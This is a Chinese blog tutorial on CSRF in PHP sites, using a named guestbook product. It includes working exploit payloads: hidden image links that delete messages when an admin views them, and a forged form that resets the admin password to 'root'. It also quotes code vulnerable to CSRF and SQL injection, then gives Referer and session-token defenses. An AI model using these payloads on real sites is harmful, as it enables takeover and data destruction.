PHP漏洞全解————6、跨站请求伪造

最新推荐文章于 2023-09-10 14:00:00 发布
最新推荐文章于 2023-09-10 14:00:00 发布
阅读量652 收藏
点赞数

本文主要介绍针对PHP网站的跨网站请求伪造。在CSRF所有攻击方式中包含攻击者伪造一个看起来是其他用户发起的HTTP 请求,事实上,跟踪一个用户发送的HTTP请求才是攻击者的目的。

CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为XSRF。攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击。攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻击者的目的。

例如:某个购物网站购买商品时,采用http://www.shop.com/buy.php?item=watch&num=1,item参数确定要购买什么物品,num参数确定要购买数量,如果攻击者以隐藏的方式发送给目标用户链接

那么如果目标用户不小心访问以后,购买的数量就成了1000个

实例

随缘网络PHP留言板V1.0

任意删除留言

//delbook.php 此页面用于删除留言

include_once("dlyz.php"); //dlyz.php用户验证权限,当权限是admin的时候方可删除留言 
include_once("../conn.php"); 
$del=$_GET["del"]; 
$id=$_GET["id"]; 
if ($del=="data") 
{ 
$ID_Dele= implode(",",$_POST['adid']); 
$sql="delete from book where id in (".$ID_Dele.")"; 
mysql_query($sql); 
} 
else 
{ 
$sql="delete from book where id=".$id; //传递要删除的留言ID 
mysql_query($sql); 
} 
mysql_close($conn); 
echo ""; 
echo "alert(‘删除成功!’);"; 
echo " location=’book.php’;"; 
echo ""; 
?>

当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言

利用方法:

我们使用普通用户留言(源代码方式),内容为

"delbook.php?id=2" /> 
"delbook.php?id=3" /> 
"delbook.php?id=4" /> 
"delbook.php?id=5" />

插入4张图片链接分别删除4个id留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了

现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。

攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了

修改管理员密码

//pass.php 
if($_GET["act"]) 
{ 
$username=$_POST["username"]; 
$sh=$_POST["sh"]; 
$gg=$_POST["gg"]; 
$title=$_POST["title"]; 
$copyright=$_POST["copyright"]."
设计制作:厦门随缘网络科技"; 
$password=md5($_POST["password"]); 
if(emptyempty($_POST["password"])) 
{ 
$sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
} 
else 
{ 
$sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
} 
mysql_query($sql); 
mysql_close($conn); 
echo ""; 
echo "alert(‘修改成功!’);"; 
echo " location=’pass.php’;"; 
echo ""; 
}

这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:

<body> 
<form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"> 
<input type="radio" value="1" name="sh"> 
<input type="radio" name="sh" checked value="0"> 
<input type="text" name="username" value="root"> 
<input type="password" name="password" value="root"> 
<input type="text" name="title" value="随缘网络PHP留言板V1.0(带审核功能)" > 
<textarea name="gg" rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!textarea> 
<textarea name="copyright" rows="6" cols="80" >随缘网络PHP留言本V1.0 版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名textarea> 
form> 
body>

存为attack.html,放到自己网站上http://www.sectop.com/attack.html,此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root

防范方法

防范CSRF要比防范其他攻击更加困难,因为CSRF的HTTP请求虽然是攻击者伪造的,但是却是由目标用户发出的,一般常见的防范方法有下面几种:

1、检查网页的来源

2、检查内置的隐藏变量

3、使用POST,不要使用GET

检查网页来源

在//pass.php头部加入以下红色字体代码,验证数据提交

if($_GET["act"]) 
{ 
if(isset($_SERVER["HTTP_REFERER"])) 
{ 
$serverhost = $_SERVER["SERVER_NAME"]; 
$strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]); 
$strdomain = explode("/",$strurl); 
$sourcehost = $strdomain[0]; 
if(strncmp($sourcehost, $serverhost, strlen($serverhost))) 
{
unset($_POST); 
echo ""; 
echo "alert(‘数据来源异常!’);"; 
echo " location=’index.php’;";
echo ""; 
} 
} 
$username=$_POST["username"]; 
$sh=$_POST["sh"]; 
$gg=$_POST["gg"]; 
$title=$_POST["title"]; 
$copyright=$_POST["copyright"]."
设计制作:厦门随缘网络科技"; 
$password=md5($_POST["password"]); 
if(emptyempty($_POST["password"])) 
{ 
$sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
} 
else 
{ 
$sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"; 
} 
mysql_query($sql); 
mysql_close($conn); 
echo ""; 
echo "alert(‘修改成功!’);"; 
echo " location=’pass.php’;"; 
echo ""; 
}

检查内置隐藏变量

我们在表单中内置一个隐藏变量和一个session变量,然后检查这个隐藏变量和session变量是否相等,以此来判断是否同一个网页所调用

php 
include_once("dlyz.php"); 
include_once("../conn.php"); 
if($_GET["act"]) 
{ 
if (!isset($_SESSION["post_id"])) 
{ 
// 生成唯一的ID,并使用MD5来加密 
$post_id = md5(uniqid(rand(), true)); 
// 创建Session变量 
$_SESSION["post_id"] = $post_id; 
} 
// 检查是否相等 
if (isset($_SESSION["post_id"])) 
{ 
// 不相等 
if ($_SESSION["post_id"] != $_POST["post_id"]) 
{ 
// 清除POST变量 
unset($_POST); 
echo "<script language=’javascript’>"; 
echo "alert(‘数据来源异常!’);"; 
echo " location=’index.php’;"; 
echo "script>"; 
} 
} 
…… 
<input type="reset" name="Submit2" value="重 置"> 
<input type="hidden" name="post_id" value="php echo $_SESSION["post_id"];?>"> 
td>tr> 
table> 
form> 
php 
} 
mysql_close($conn); 
?> 
body> 
html>

使用POST,不要使用GET

传递表单字段时,一定要是用POST,不要使用GET,处理变量也不要直接使用$_REQUEST

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【项目实战】Web端常见的高风险漏洞与解决方法(CSRF跨站请求伪造 攻击)
本本本添哥
11-25 1089
CSRF(Cross-site request forgery 跨站请求伪造
CSRF跨站请求伪造实例程序
11-07
一个php做的简单的银行管理系统,利用cookie值来达到跨站伪造请求的目的,最终造成银行账户余额被修改。
PHP 中的跨站请求伪造
allway2的博客
07-25 314
其他类型的资源,如常规HTML表单或任何其他状态更改路由,必须通过手动生成和检查CSRF令牌来明确保护。开发人员必须通过检查会话令牌或使用许多经过良好测试的库和框架之一来手动实现它。OWASPCSRFProtector是一个独立的php库,用于Web应用程序中的CSRF缓解。Twig函数在模板中生成一个CSRF令牌,并将其存储为隐藏的表单字段。然后,在控制器动作中获取CSRF令牌的值,并使用。考虑使用常规HTML表单来删除资源。要使用它,只需包含库并调用。...
web安全之跨站请求伪造
热门推荐
交换一个思想,能得到俩思想
12-23 2万+
CSRF(Cross-site request forgery),中文名称:跨站请求伪造. 因为这个不是用户真正想发出的请求,这就是所谓的请求伪造;因为这些请求也是可以从第三方网站提交的,所以前缀跨站二字。 CSRF发生的场景如下图所示: 用户登录访问了一个受信任的站点, 在用户还没有退出登录的时候,打开另外一个tab页,访问了网站B。 在B网站中,有CSRF攻击代码访问网站A。
PHP-漏洞之一】跨网站请求伪造
Chanson
04-25 521
攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击。 攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻击者的目的。 例如:某个购物网站购买商品时,采用http://www.taobao.com/gouma
php漏洞与代码审计
anjuzi的专栏
06-06 583
在甲方公司做代码审计一般还是以白盒为主,漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露等。 1.xss + sql注入 其中占大头的自然是XSS与SQL注入,对于框架类型或者有公共文件的,建议在公共文件中统一做一次XSS和SQL注入的过滤。写个过滤函数,可由如下所示: $_REQUEST = filter_xss($_
CSRF———— (一)跨站伪造请求漏洞示例
weixin_43102772的博客
03-01 228
一、什么是CSRF 1.1简介 csrf(cross-site request forgery)跨站请求伪造。缩写为CSRF或XSRF。CSRF通过利用受信任用户的请求来利用受信任的网站,简单来说,就是利用用户请求来利用网站。 1.2 CSRF和XSS区别 XSS是利用用户对浏览器的信任 盗取cookie CSRF是利用网站对用户浏览器的信任 对网站发起请求,达到攻击者述求 1.3 CSRF原...
东南大学网络空间安全实验基础——跨站请求伪造攻击实验
07-07
东南大学网络空间安全实验基础——跨站请求伪造攻击实验 本实验报告主要讲述了跨站请求伪造攻击(CSRF)的原理和防御方法。CSRF 攻击是一种常见的网络攻击方式,攻击者可以通过欺骗用户来访问恶意网站,从而达到...
CSRF跨站请求伪造,含使用教程和测试工具
05-04
CSRF跨站请求伪造,使用OWASP CSRFTester工具可以抓取并伪造请求,其测试原理是,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一...
【代码】利用php防止用户伪造跨站请求的小技巧
10-10 1701
清源教育php开发课程学习培训之php常用的伪造跨站请求介绍 伪造跨站请求比较难以防范,而且危险系数很大,恶意攻击者经常通过这种方式进行恶作剧,发spam信息,删除网站数据等等。这种常见的攻击表现形式有: 伪造恶意的链接,诱骗用户去点击,或者让用户在毫无防备的情况下访问 伪造提交表单,诱骗用户提交。表单是隐藏类型的,用图片或链接的形式伪装。 比较常见并且最常用的防范手段是在
php 跨站请求伪造,PHP 跨站请求伪造及防护 (CSRF)【未完成】
weixin_39778447的博客
03-24 292
一、什么是 CSRF跨站请求伪造(Cross-Site Request Forgery),通常缩写为 CSRF 或者 XSRF,是一种使已登录用户在不知情的情况下执行某种动作的攻击。二、CSRF请求过程CSRF在违反同源策略的情况下,攻击主要用来执行某种非法动作,而非窃取用户数据。例如,当受害者是一个普通用户时,CSRF可以实现在其不知情的情况下进行转移用户资金、发送邮件等操作。但是如果受害者是一...
php 模拟访问csrf,PHP中的CSRF(跨站请求伪造)攻击示例和预防
weixin_36437103的博客
03-11 273
CSRF攻击中有3个玩家受害者的网站(在您的示例中为您的投票网站)[知道他已登录的用户cookie]客户的浏览器(登录时)[知道他的cookie]攻击者的网站[不知道登录用户的cookie]CSRF攻击取决于2个事实浏览器会根据每个请求自动发送cookie我们依靠cookie来标识我们的登录用户(例如:csrfSecret)如果攻击者可以轻易使他人或已登录的用户要求此操作// http://vic...
跨站请求伪造
最新发布
cgjil的博客
09-10 179
1.1。
如何跨站调用php,如何在PHP中有效防止跨站请求伪造(CSRF)
weixin_39795419的博客
03-13 126
Is this a good way to prevent CSRF?是.这样做是为了强制客户端在表单上执行GET,然后才能对表单处理程序执行POST操作.这可以防止现代浏览器中的CSRF,因为浏览器会阻止客户端Javascript对外部域执行XHR GET请求,因此第三方无法在其网站上模仿您的表单并成功获得提交的有效令牌.When another page is opened as well t...
php定时执行代码漏洞_常见的PHP代码执行漏洞
weixin_35812176的博客
01-14 235
1. 代码执行函数PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等demo code 1.1:echo `dir`;?>2. 文件包含代码注射文件包含函数在特定条件下的代码注射,如include()、include_once()、...
防止伪造跨站请求
Just Code
09-03 170
关联: 征服 Ajax 应用程序的安全威胁 AJAX 跨域请求 - JSONP获取JSON数据   跨站脚本 在媒体的帮助下,跨站脚本(XSS)成为了大家关注的焦点,当然它是绝对应当关注的。XSS 是 web 应用中最常见的安全隐患,许多流行的开放源代码的 PHP 应用程序受到 XSS 隐患的困扰。 XSS 攻击发生在下面的情况下: 对于...
PHP跨站点对接访问请求
weixin_41692437的博客
09-21 246
PHP跨站点接口请求访问
php如何跨站post,如何使用PHP正确添加跨站请求伪造(CSRF)令牌
weixin_29332623的博客
03-10 265
小编典典对于安全代码,请不要以这种方式生成令牌: $token = md5(uniqid(rand(), TRUE));rand() 是可以预见的uniqid() 最多只加29位熵md5() 不添加熵,而是确定性地将其混合试试看:生成CSRF令牌PHP 7session_start();if (empty($_SESSION['token'])) {$_SESSION['token'] = bin...
CSRFTester:详述跨站请求伪造漏洞的测试工具
它通过抓取并修改浏览器中访问的链接和表单数据,模拟伪造的客户端请求,以判断目标网站是否存在此类漏洞。" CSRF漏洞详解: CSRF攻击是一种恶意攻击方式,攻击者利用受害者在受信任的网站上已有的会话,伪造一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值